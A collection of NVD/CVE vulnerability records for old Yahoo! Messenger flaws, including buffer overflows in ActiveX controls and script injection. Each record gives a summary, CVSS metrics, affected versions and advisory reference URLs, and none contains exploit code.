"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.iss.net/security_center/static/8265.php"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/419419"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/887319"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/4162"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/4163"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2002-07-26 04:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://online.securityfocus.com/archive/1/274223 | Vendor Advisory | |
| cve@mitre.org | http://www.cert.org/advisories/CA-2002-16.html | Patch, Third Party Advisory, US Government Resource | |
| cve@mitre.org | http://www.iss.net/security_center/static/9184.php | ||
| cve@mitre.org | http://www.kb.cert.org/vuls/id/172315 | Patch, Third Party Advisory, US Government Resource | |
| cve@mitre.org | http://www.securityfocus.com/bid/4838 | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://online.securityfocus.com/archive/1/274223 | Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.cert.org/advisories/CA-2002-16.html | Patch, Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.iss.net/security_center/static/9184.php | ||
| af854a3a-2127-422b-91ae-364da2661108 | http://www.kb.cert.org/vuls/id/172315 | Patch, Third Party Advisory, US Government Resource | |
| af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/4838 | Patch, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "D6BF80C1-8F4D-40AF-88FD-D1AFDC03EC6C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 5,0,0,1064 and earlier allows remote attackers to execute arbitrary script as other users via the addview parameter of a ymsgr URI."
}
],
"id": "CVE-2002-0032",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": true,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2002-07-26T04:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "cve@mitre.org",
"url": "http://www.iss.net/security_center/static/9184.php"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/172315"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/4838"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://online.securityfocus.com/archive/1/274223"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.cert.org/advisories/CA-2002-16.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.iss.net/security_center/static/9184.php"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/172315"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/4838"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-04-06 01:19
Modified
2025-04-09 00:30
Severity ?
Summary
Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
"matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.209:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9243F4-ADE8-4B7A-A195-EEAD41FF14EA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.239:*:*:*:*:*:*:*",
"matchCriteriaId": "3CAF169E-8466-43EF-A03D-D49256EB2C18",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in the createAndJoinConference function in the AudioConf ActiveX control (yacscom.dll) in Yahoo! Messenger before 20070313 allows remote attackers to execute arbitrary code via long (1) socksHostname and (2) hostname properties."
},
{
"lang": "es",
"value": "Desbordamiento de b\u00fafer en la funci\u00f3n createAndJoinConference en el control ActiveX AudioConf (yacscom.dll) en Yahoo! Messenger anterior a 20070313 permite a atacantes remotos ejecutar c\u00f3digo de su elecci\u00f3n a trav\u00e9s de las propiedades (1) socksHostname y (2) hostname."
}
],
"id": "CVE-2007-1680",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2007-04-06T01:19:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/34319"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/24742"
},
{
"source": "cve@mitre.org",
"url": "http://securityreason.com/securityalert/2523"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/23291"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1017867"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://messenger.yahoo.com/security_update.php?id=031207"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/34319"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/24742"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securityreason.com/securityalert/2523"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/388377"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/464607/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.securityfocus.com/bid/23291"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1017867"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2007/1219"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://www.zerodayinitiative.com/advisories/ZDI-07-012.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/33408"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-06-11 18:30
Modified
2025-04-09 00:30
Severity ?
Summary
Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method.
References
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:2.0.1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "6944C050-C328-45DB-B2C3-0CA43C0D790C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "B7178A56-42F9-44BC-8742-402480F761FA",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.0.863:*:*:*:*:*:*:*",
"matchCriteriaId": "5D369102-AC28-45D1-A9E7-B6C4F34529C1",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0.1:*:*:*:*:*:*:*",
"matchCriteriaId": "012BF14B-1009-4BDE-A699-C5989F576199",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.0_2005.1.1.4:*:*:*:*:*:*:*",
"matchCriteriaId": "7B4212E3-8338-430F-A9BC-A28D502B8B81",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.249:*:*:*:*:*:*:*",
"matchCriteriaId": "15660D84-B392-457E-B433-9B9180A49B3E",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Buffer overflow in the Yahoo! Webcam Viewer ActiveX control in ywcvwr.dll 2.0.1.4 for Yahoo! Messenger 8.1.0.249 allows remote attackers to execute arbitrary code via a long server property value to the receive method."
},
{
"lang": "es",
"value": "El desbordamiento del b\u00fafer en el control ActiveX de Yahoo! Webcam Viewer en ywcvwr.dll versi\u00f3n 2.0.1.4 para Yahoo! Messenger versi\u00f3n 8.1.0.249 permite a los atacantes remotos ejecutar c\u00f3digo arbitrario por medio de un valor largo propiedad del servidor para el m\u00e9todo de recepci\u00f3n."
}
],
"id": "CVE-2007-3148",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2007-06-11T18:30:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/37081"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/25547"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/932217"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/24355"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1018203"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"source": "cve@mitre.org",
"url": "https://www.exploit-db.com/exploits/4043"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2007-June/063819.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "http://messenger.yahoo.com/security_update.php?id=060707"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/37081"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://research.eeye.com/html/advisories/published/AD20070608.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "http://research.eeye.com/html/advisories/upcoming/20070605.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/25547"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://securitytracker.com/id?1018204"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/932217"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/470861/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/24341"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit"
],
"url": "http://www.securityfocus.com/bid/24355"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1018203"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2007/2094"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/34759"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.exploit-db.com/exploits/4043"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2007-08-17 22:17
Modified
2025-04-09 00:30
Severity ?
Summary
Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an "invite to view my webcam" request, and then injecting a DLL into the attacker's peer Yahoo! Messenger application when this request is accepted.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:8.1.0.413:*:*:*:*:*:*:*",
"matchCriteriaId": "40D0435F-F38D-42E2-AA34-F256B9D2B2C0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Heap-based buffer overflow in Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 allows remote attackers to cause a denial of service (application crash) via a certain length field in JPEG2000 data, as demonstrated by sending an \"invite to view my webcam\" request, and then injecting a DLL into the attacker\u0027s peer Yahoo! Messenger application when this request is accepted."
},
{
"lang": "es",
"value": "Desbordamiento de b\u00fafer basado en pila en Kakadu kdu_v32m.dll in Yahoo! Messenger 8.1.0.413 permite a atacantes remotos provocar denegaci\u00f3n de servicio (caida de aplicaci\u00f3n)a trav\u00e9s de ciertas longitudes de campo en los datos JPEG2000, como se demostr\u00f3 con el env\u00edo de una respuesta a \"una invitaci\u00f3n para ver mi webcam\", y su posterior inyecci\u00f3n de una DLL dentro de la aplicaci\u00f3n Yahoo! Messenger atacada cuando esta respuesta es aceptada."
}
],
"id": "CVE-2007-4391",
"lastModified": "2025-04-09T00:30:58.490",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 9.3,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 10.0,
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2007-08-17T22:17:00.000",
"references": [
{
"source": "cve@mitre.org",
"url": "http://osvdb.org/38221"
},
{
"source": "cve@mitre.org",
"url": "http://secunia.com/advisories/26501"
},
{
"source": "cve@mitre.org",
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"source": "cve@mitre.org",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/bid/25330"
},
{
"source": "cve@mitre.org",
"url": "http://www.securitytracker.com/id?1018586"
},
{
"source": "cve@mitre.org",
"url": "http://www.team509.com/expyahoo.rar"
},
{
"source": "cve@mitre.org",
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"source": "cve@mitre.org",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"source": "cve@mitre.org",
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://osvdb.org/38221"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://secunia.com/advisories/26501"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.avertlabs.com/research/blog/index.php/2007/08/15/more-on-the-yahoo-messenger-webcam-0day/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"US Government Resource"
],
"url": "http://www.kb.cert.org/vuls/id/515968"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/bid/25330"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securitytracker.com/id?1018586"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.team509.com/expyahoo.rar"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.vupen.com/english/advisories/2007/2917"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36115"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "https://www.xfocus.net/bbs/index.php?act=ST\u0026f=2\u0026t=64639\u0026page=1#entry321749"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-20"
},
{
"lang": "en",
"value": "CWE-119"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2005-02-17 05:00
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions.
References
| ▼ | URL | Tags | |
|---|---|---|---|
| cve@mitre.org | http://secunia.com/advisories/13712 | Patch, Vendor Advisory | |
| cve@mitre.org | http://secunia.com/secunia_research/2005-2/advisory/ | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://secunia.com/advisories/13712 | Patch, Vendor Advisory | |
| af854a3a-2127-422b-91ae-364da2661108 | http://secunia.com/secunia_research/2005-2/advisory/ | Patch, Vendor Advisory |
Impacted products
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.5:*:*:*:*:*:*:*",
"matchCriteriaId": "349A209F-6609-4809-B228-E84623FA268D",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6:*:*:*:*:*:*:*",
"matchCriteriaId": "92465439-530F-435E-976F-491AD3C56944",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:5.6.0.1351:*:*:*:*:*:*:*",
"matchCriteriaId": "38232D5E-568C-4CFA-BA01-C35939D68AB2",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0:*:*:*:*:*:*:*",
"matchCriteriaId": "F8EE7278-FFAD-489B-BDCC-BF6BA8D5DF0C",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:yahoo:messenger:6.0.0.1750:*:*:*:*:*:*:*",
"matchCriteriaId": "0595ECE8-C876-441F-B90A-FC8D80BA1034",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions."
}
],
"id": "CVE-2005-0243",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 10.0,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
]
},
"published": "2005-02-17T05:00:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/13712"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/secunia_research/2005-2/advisory/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/advisories/13712"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Vendor Advisory"
],
"url": "http://secunia.com/secunia_research/2005-2/advisory/"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2006-09-25 01:07
Modified
2025-04-03 01:03
Severity ?
Summary
Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service.
References
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:yahoo:messenger:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A1F32DA0-0851-4093-8380-F4EA5F53F47C",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service."
},
{
"lang": "es",
"value": "Yahoo! Messenger para WAP permite guardar mensajes que contienen JavaScript, lo cual permite a atacantes con la complicidad del usuario inyectar secuencias de comandos web o HTML de su elecci\u00f3n a trav\u00e9s de una URL en el servicio en linea."
}
],
"id": "CVE-2006-4975",
"lastModified": "2025-04-03T01:03:51.193",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "HIGH",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 2.6,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:H/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 4.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
]
},
"published": "2006-09-25T01:07:00.000",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
},
{
"source": "cve@mitre.org",
"url": "http://securityreason.com/securityalert/1626"
},
{
"source": "cve@mitre.org",
"url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://securityreason.com/securityalert/1626"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Deferred",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "NVD-CWE-Other"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
CVE-2004-0043 (GCVE-0-2004-0043)
Vulnerability from cvelistv5
Published
2004-01-14 05:00
Modified
2024-08-08 00:01
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- n/a
Summary
Buffer overflow in Yahoo Instant Messenger 5.6.0.1351 and earlier allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long filename in the download feature.
References
| ▼ | URL | Tags |
|---|---|---|
| http://marc.info/?l=bugtraq&m=107357996802255&w=2 | mailing-list, x_refsource_BUGTRAQ | |
| http://secunia.com/advisories/10573 | third-party-advisory, x_refsource_SECUNIA | |
| http://www.securitytracker.com/id?1008651 | vdb-entry, x_refsource_SECTRACK | |
| http://www.securityfocus.com/bid/9383 | vdb-entry, x_refsource_BID | |
| http://www.osvdb.org/3437 | vdb-entry, x_refsource_OSVDB | |
